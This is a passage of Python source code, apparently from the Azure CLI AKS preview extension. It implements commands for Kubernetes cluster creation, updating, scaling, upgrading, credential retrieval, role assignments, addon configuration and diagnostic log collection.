link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
_re_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
flags=re.IGNORECASE)
def _get_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_snapshots_client(cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError("Snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
from azure.cli.command_modules.acs.custom import _aks_browse
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser,
listen_address,
listen_port,
CUSTOM_MGMT_AKS_PREVIEW,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
pod_cidrs=None,
service_cidrs=None,
ip_families=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
edge_zone=None,
enable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
workload_runtime=None,
gpu_instance_profile=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
enable_oidc_issuer=False,
yes=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewCreateDecorator
# decorator pattern
aks_create_decorator = AKSPreviewCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc_preview(mc)
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
nodepool_labels=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
enable_oidc_issuer=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewUpdateDecorator
# decorator pattern
aks_update_decorator = AKSPreviewUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
resource_id)
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
# Form containerName from fqdn, as it was previously jsut the location of code is changed.
# https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
maxContainerNameLength = 63
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_container_name = fqdn.replace('.', '-')
len_of_container_name = normalized_container_name.index("-hcp-")
if len_of_container_name == -1:
len_of_container_name = maxContainerNameLength
container_name = normalized_container_name[:len_of_container_name]
sas_token = sas_token.strip('?')
deployment_yaml = _read_periscope_yaml()
deployment_yaml = deployment_yaml.replace("# <accountName, string>", storage_account_name)
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <containerName, string>", container_name)
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
curr_dir = os.path.dirname(os.path.realpath(__file__))
periscope_yaml_file = os.path.join(curr_dir, "deploymentyaml", "aks-periscope.yaml")
yaml_file = open(periscope_yaml_file, "r")
data_loaded = yaml_file.read()
return data_loaded
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster " \
"and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False,
rotation_poll_interval=None,):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
